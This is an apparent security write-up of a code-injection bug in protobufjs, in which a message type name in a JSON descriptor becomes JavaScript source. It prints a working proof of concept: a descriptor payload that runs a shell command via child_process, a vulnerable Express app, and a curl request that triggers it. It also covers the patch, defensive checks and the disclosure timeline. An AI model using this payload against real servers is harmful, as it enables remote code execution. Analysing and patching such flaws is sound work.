CVE-2026-41242: protobufjs's Type Name Was JavaScript

The codegen library treats the function-name parameter as source code

@protobufjs/codegen is a hundred-line npm package that protobufjs uses to build per-type encoder, decoder, verifier, and converter functions at runtime. Its public API is one function: codegen(params, name). The caller appends body lines with format-string calls, then finalizes by passing a scope object. The build step is a string concatenation:

function toString(functionNameOverride) {
    return "function " + (functionNameOverride || functionName || "") +
           "(" + (functionParams && functionParams.join(",") || "") +
           "){\n  " + body.join("\n  ") + "\n}";
}

Body lines are appended with %i, %j, %s format specifiers. The JSON specifier is the load-bearing one: gen("foo=%j", value) JSON-stringifies value so it embeds as a valid JS literal even when it carries quotes, newlines, or backslashes. Every author writing a body line understands that the formatter is responsible for escaping data into source.

The function-name parameter has no formatter. It is interpolated bare. The library's contract is implicit: callers must pass a string that is also a valid JavaScript identifier. Nothing in the library checks the contract. Nothing in the library documents it as a contract. The README's first sentence reads "A minimalistic code generation utility." It is.
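
The asymmetry is easy to see side by side. The following is a minimal sketch, assuming a stripped-down stand-in for the library (buildSource is a hypothetical helper, not the package's API): the value goes through JSON.stringify the way %j does, while the name is concatenated as-is.

```javascript
// Hypothetical stand-in for the codegen build step; not the real package API.
function buildSource(name, params, value) {
    // The body line escapes its data the way %j does: via JSON.stringify.
    const bodyLine = "var foo=" + JSON.stringify(value) + ";";
    // The name and parameter list are concatenated with no escaping at all.
    return "function " + name + "(" + params.join(",") + "){\n  " + bodyLine + "\n}";
}

const hostile = '"; evil(); //';

// As a value: the quote is escaped, so the text stays inside a string literal.
const asValue = buildSource("ok", ["m"], hostile);

// As a name: the text lands in the source verbatim.
const asName = buildSource("a(){}; function b", ["m"], "x");

console.log(asValue);
console.log(asName);
```

The first output keeps the hostile text inside a quoted literal. The second contains two function definitions where the caller asked for one.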

Six call sites, one trust boundary, and it lived nowhere

protobufjs builds five families of generated functions per message type, plus a generated constructor. Each call site picks a function name in the same shape:

// src/decoder.js:19
var gen = util.codegen(["r", "l", "e"], mtype.name + "$decode")
// src/encoder.js:30
var gen = util.codegen(["m", "w"], mtype.name + "$encode")
// src/verifier.js:125
var gen = util.codegen(["m"], mtype.name + "$verify")
// src/converter.js:108
var gen = util.codegen(["d"], mtype.name + "$fromObject")
// src/converter.js:211
var gen = util.codegen(["m", "o"], mtype.name + "$toObject")
// src/type.js:200
var gen = util.codegen(["p"], mtype.name);

Six places. Five of them append a verb to mtype.name; the sixth passes it through unchanged. Either way the result becomes the function name. The name comes from Type.prototype.name, set in the constructor:

function Type(name, options) {
    Namespace.call(this, name, options);
    ...
}

name is whatever the caller passed. Pre-patch, the constructor performs no validation. The Namespace base class stores it on this.name. Six codegen sites read it back and concatenate.

The trust boundary lived nowhere. The decoder author trusted Type. Type trusted its caller. The codegen library trusted Type. None of the three layers between the descriptor and the Function() constructor held the responsibility of checking that the name was a JavaScript identifier. The patch makes Type the holder. Pre-patch, nobody held it.

The exploit primitive

A protobuf descriptor in JSON form is a dictionary of message types, each with named fields. A field's type value is the name of either a primitive (int32, string) or another message type defined elsewhere in the same descriptor. Root.fromJSON walks the dictionary and constructs a Type per entry, taking the dictionary key as the name. The PoC's payload.json makes the dictionary key the injection vector:

{
  "nested": {
    "User": {
      "fields": {
        "id":   { "type": "int32", "id": 1 },
        "data": {
          "type": "Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\nfunction X",
          "id": 2
        }
      }
    },
    "Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\nfunction X": {
      "fields": { "content": { "type": "string", "id": 1 } }
    }
  }
}

Two message types. The second is keyed by Data(){...payload...};\nfunction X. User.data references it by that exact key. The vulnerable web app the PoC ships with is under twenty lines:

const express = require('express');
const protobuf = require('protobufjs');

const app = express();
app.use(express.json());

app.post('/create_user', (request, response) => {
    const descriptor = request.body;
    const root = protobuf.Root.fromJSON(descriptor);
    const UserType = root.lookupType('User');
    const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);
    try { UserType.decode(userBytes); } catch (e) { }
});

app.listen(3000);

The route accepts a JSON body, builds a protobuf root from it, looks up User, and decodes a fixed eleven-byte payload. The userBytes decode to User { id: 1, data: Data { content: "hello" } }; the nested Data message accounts for seven of those bytes. The decode of the data field is what reaches the second Type and triggers code generation for it.
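
The byte layout can be checked by hand. A minimal sketch, assuming only the two wire types this payload uses (varint and length-delimited) and single-byte varints; readFields is a hypothetical helper, not protobufjs's Reader:

```javascript
// Walk the PoC's userBytes by hand. Only wire types 0 (varint) and
// 2 (length-delimited) are handled, and varints are assumed to fit one byte.
function readFields(bytes) {
    const fields = [];
    let pos = 0;
    while (pos < bytes.length) {
        const tag = bytes[pos++];
        const fieldNumber = tag >> 3;
        const wireType = tag & 7;
        if (wireType === 0) {
            fields.push({ fieldNumber, value: bytes[pos++] });
        } else if (wireType === 2) {
            const length = bytes[pos++];
            fields.push({ fieldNumber, value: bytes.slice(pos, pos + length) });
            pos += length;
        } else {
            throw new Error("unsupported wire type " + wireType);
        }
    }
    return fields;
}

const userBytes = [0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f];
const user = readFields(userBytes);      // field 1 (id) and field 2 (data)
const data = readFields(user[1].value);  // field 1 (content) of the nested message
const content = String.fromCharCode(...data[0].value);

console.log(user[0].value, content);
```

The length prefix 0x07 covers the nested Data message; the tag and length bytes around it belong to User. Nothing in these bytes is hostile.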

Type.prototype.decode is a stub that calls this.setup() on first invocation and replaces itself with the generated function. setup() calls all five codegen generators in sequence. The first one is encoder(), which calls:

var gen = util.codegen(["m", "w"], mtype.name + "$encode")

For the second Type, mtype.name is the malicious string. mtype.name + "$encode" becomes Data(){...};\nfunction X$encode. The codegen library appends body lines, then finalizes. toString() returns:

function Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};
function X$encode(m,w){
  ...encoder body...
}

The library prepends return to that source and passes it to the Function constructor:

source = "return " + source;
...
return Function.apply(null, scopeParams).apply(null, scopeValues);

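return function Data(){...} is a return statement followed by a function expression. The expression evaluates to a function object; the return statement returns it; the rest of the source (the X$encode declaration) is a hoisted declaration that nothing ever calls. Function.apply(null, scopeParams) builds an outer function from that source, and .apply(null, scopeValues) invokes it. What comes back is Data, not an encoder. setup() installs it where the generated function was supposed to go, and the same substitution repeats for the decoder, whose name slot carries the same string. The decode stub then forwards the pending call to what it believes is the generated decoder. Calling it executes console.log(process.mainModule.require('child_process').execSync('id').toString()).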
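
The parse can be checked in isolation. A minimal sketch, assuming a harmless payload (mark is a hypothetical scope entry standing in for the shell command) and hand-built source in place of the library's toString():

```javascript
// Benign stand-in for the injected type name: the "payload" only sets a flag.
let payloadRan = false;
const scope = { mark: () => { payloadRan = true; } };

const name = "Data(){mark()};\nfunction X";
const source = "return function " + name + "$encode(m,w){\n  return w\n}";

// Same shape as the library's final step: scope keys become parameters of an
// outer function whose body is the generated source.
const keys = Object.keys(scope);
const outer = Function.apply(null, keys.concat(source));
const generated = outer.apply(null, keys.map((k) => scope[k]));

console.log(generated.name);  // name of the function the return statement produced
generated();                  // whoever calls the "encoder" runs the payload instead
console.log(payloadRan);
```

The function that comes back carries the attacker's body under the name Data. The intended X$encode function exists only as a declaration inside the outer function and is never handed to the caller.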

The single curl that fires this:

curl -X POST -H 'Content-Type: application/json' \
  http://target:3000/create_user --data @payload.json

The PoC's harness has no exposed return path for command output, so the demonstration writes to console.log. A real attack would write to a file, hit an outbound URL, or replace the function body with eval(process.env.REMOTE_PAYLOAD). The descriptor is JSON; Root.fromJSON imposes no size limit of its own; the function-name slot accepts every Unicode character. The 4chech harness ships the minimum demonstration. The class admits much larger payloads.

What the description names

The cve.org record reads: "attackers can inject arbitrary code in the 'type' fields of protobuf definitions, which will then execute during object decoding using that definition." The description is correct on every word. It is also not enough to find the bug.

A defender reading the description without the codepath looks for a JSON parser that evals input, finds none, and concludes the bug must be in protobuf-message bytes rather than protobuf-descriptor objects. The wire payload in the PoC is [0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f], an unremarkable eleven-byte serialization. The injection lives in the descriptor. The "during object decoding" timing means the codegen runs lazily on first decode() rather than eagerly during Root.fromJSON, so a server that parses descriptors but never decodes against them is not exploitable, and a server that does both is fully exploitable. The description leaves both halves of that distinction to the reader.
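
The lazy timing is a general pattern, sketched here in miniature. LazyType is a hypothetical stand-in, not protobufjs's Type; the assumption is only that decode starts as a stub that generates the real function on first call and then replaces itself:

```javascript
// Hypothetical miniature of the lazy pattern described above.
function LazyType(name) {
    this.name = name;
    this.generatedCount = 0;
}

LazyType.prototype.setup = function setup() {
    this.generatedCount++;
    // Stand-in for the real code generation step; shadows the prototype stub.
    this.decode = function decode(bytes) { return { length: bytes.length }; };
    return this;
};

LazyType.prototype.decode = function decodeStub(bytes) {
    return this.setup().decode(bytes);
};

const t = new LazyType("User");
const beforeFirstDecode = t.generatedCount;  // constructing the type generates nothing
t.decode([1, 2, 3]);
t.decode([4, 5]);
const afterTwoDecodes = t.generatedCount;    // generation ran once, on the first decode

console.log(beforeFirstDecode, afterTwoDecodes);
```

Under this shape, loading a hostile descriptor is silent. The first decode against it is the trigger.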

This is content-is-command

A JSON descriptor is content. The codegen library is an interpreter that reads strings out of the descriptor and produces JavaScript. The bridge is the function-name parameter in @protobufjs/codegen, where strings cross from the data plane to the source-text plane without escaping. This is the Content Is Command pattern exactly: an external input channel feeds an interpreter that treats it as instructions because the interpreter never separated instruction from data at the boundary the channel was crossing.

The closest sibling exhibit is graphql-ruby. CVE-2025-27407 took a JSON introspection document, read field names from it, and spliced them into a Ruby class_eval <<-RUBY HEREDOC that defined methods. The interpreter was the Ruby compiler; the bridge was an unescaped name interpolation; the content source was an external schema document. The graphql-ruby fix added /^[_a-zA-Z][_a-zA-Z0-9]*$/ to the name handler and replaced the class_eval with a captured-closure define_method. The protobufjs case is the same shape with JavaScript and Function() in place of Ruby and class_eval, and a JSON descriptor in place of a JSON introspection document. The protobufjs fix is the regex equivalent. Both fixes name the contract the loader was supposed to enforce and never had.
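
The same identifier regex can be applied on the consumer side before a descriptor is ever loaded. A minimal sketch, assuming the JSON descriptor layout shown earlier (type and namespace names as keys under "nested"); findBadNames is a hypothetical helper, not part of protobufjs, and it checks only those keys, not field names or type references:

```javascript
// Hypothetical pre-check: collect every key under "nested" that is not a
// plain identifier, recursing into nested namespaces and types.
const IDENTIFIER = /^[_a-zA-Z][_a-zA-Z0-9]*$/;

function findBadNames(descriptor, path = []) {
    const bad = [];
    const nested = (descriptor && descriptor.nested) || {};
    for (const key of Object.keys(nested)) {
        if (!IDENTIFIER.test(key)) bad.push(path.concat(key).join("."));
        bad.push(...findBadNames(nested[key], path.concat(key)));
    }
    return bad;
}

const clean = { nested: { User: { fields: {} }, pkg: { nested: { Data: { fields: {} } } } } };
const hostile = { nested: { "Data(){};\nfunction X": { fields: {} } } };

console.log(findBadNames(clean));
console.log(findBadNames(hostile).length);
```

Rejecting is a different choice from the protobufjs patch, which strips characters and carries on. Rejection surfaces the hostile descriptor instead of silently renaming its types.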

The fix is at Type. The library is unchanged.

The patch is one line in src/type.js:

 function Type(name, options) {
+    name = name.replace(/\W/g, "");
     Namespace.call(this, name, options);

\W matches every character that is not in [A-Za-z0-9_]. Parentheses, semicolons, newlines, dots, brackets, slashes, spaces, every Unicode codepoint outside the identifier class. The patch's commit message: "There is no reason why the type name would contain anything other than alphanumeric characters. Filter the remaining characters with a regex." The contract is named for the first time in the line that enforces it.
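
What the replace leaves behind can be checked directly. A small sketch using a shortened stand-in for the PoC key and two edge cases of my own choosing:

```javascript
// Shortened stand-in for the PoC's dictionary key.
const key = "Data(){console.log(1)};\nfunction X";
const stripped = key.replace(/\W/g, "");

// Without the u flag, \W is exactly [^A-Za-z0-9_], so non-ASCII letters go too.
const unicode = "Сообщение_1".replace(/\W/g, "");

// Digits survive, so a leading digit is still possible after stripping.
const leadingDigit = "1st-Type".replace(/\W/g, "");

console.log(stripped, unicode, leadingDigit);
```

The stripped key is one long run of word characters with nothing left that can close the function header. A result that starts with a digit is still not a valid identifier, but the worst it can produce is a syntax error when the source is compiled.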

@protobufjs/codegen is a separate package on npm with its own version (2.0.4 as shipped in vulnerable installs). The codegen package's Codegen.toString still concatenates the functionName parameter into source text without validation. Any other consumer of @protobufjs/codegen that passes caller-influenced strings as the function name has the same primitive available. The package's README, its TypeScript types, and its index.js source contain no statement that the function name must be a valid JavaScript identifier.

protobufjs's fix solves protobufjs. It is the right shape of fix; the Type constructor is the natural choke point for incoming descriptor data, and one regex there protects all six call sites with no per-site changes. It does not solve @protobufjs/codegen, which continues to publish under the contract-by-implication it always had. The function-name slot, like the parameter list joined next to it, has no escape formatter in @protobufjs/codegen. It is the only one this CVE ever needed.
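
For other consumers of a codegen-style API, the missing contract can be enforced at the call boundary. A minimal sketch under stated assumptions: assertIdentifier and buildFunctionSource are hypothetical names, and buildFunctionSource is a stand-in for the library's build step, not its actual code.

```javascript
// Hypothetical guard: refuse names that are not plain ASCII identifiers
// before they reach string concatenation.
function assertIdentifier(name) {
    if (typeof name !== "string" || !/^[A-Za-z_$][A-Za-z0-9_$]*$/.test(name)) {
        throw new TypeError("not a valid identifier: " + JSON.stringify(name));
    }
    return name;
}

// Stand-in for the build step, with the check applied to the function name
// and to each parameter name.
function buildFunctionSource(params, name, bodyLines) {
    return "function " + assertIdentifier(name) +
           "(" + params.map(assertIdentifier).join(",") +
           "){\n  " + bodyLines.join("\n  ") + "\n}";
}

const ok = buildFunctionSource(["m", "w"], "User$encode", ["return w"]);

let rejected = false;
try {
    buildFunctionSource(["m"], "Data(){};\nfunction X$encode", ["return m"]);
} catch (e) {
    rejected = e instanceof TypeError;
}

console.log(ok);
console.log(rejected);
```

The regex admits $ because the generated names in this article use it as a separator. Reserved words still pass the check; they fail later at compile time rather than injecting anything.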

The disclosure window was the diff

Cristian Staicu of Endor Labs filed protobufjs issue #2124 on February 25, 2026. The issue body contains no technical detail; it asks the maintainers to set up a security policy and a private advisory channel so the report can move out of the public tracker. Pull request #2127 with the one-line fix landed in master on March 11, 2026, with the commit message quoted above. The release tagged protobufjs-cli-v2.0.1 carries the fix at 535df44. The GitHub Security Advisory was not published until April 16, 2026.

Thirty-six days separated the public commit from the public advisory. The diff itself was the disclosure: a maintainer-written patch that strips non-alphanumeric characters from a type name describes a class of input that previously was not stripped, and the consumers of that name (the six codegen sites listed above) are the obvious places to look. The PoC at 4chech/CVE-2026-41242 ships with Russian comments (// JSON-дескриптор из тела запроса, "JSON descriptor from the request body"), pins protobufjs ^7.5.4, and reproduces against the upstream commit immediately preceding the fix. The author did not need access to the advisory to build the harness. The commit was enough.

PoC: 4chech/CVE-2026-41242

The patch closes this CVE. The codegen library that interpolated the name into source code is unchanged.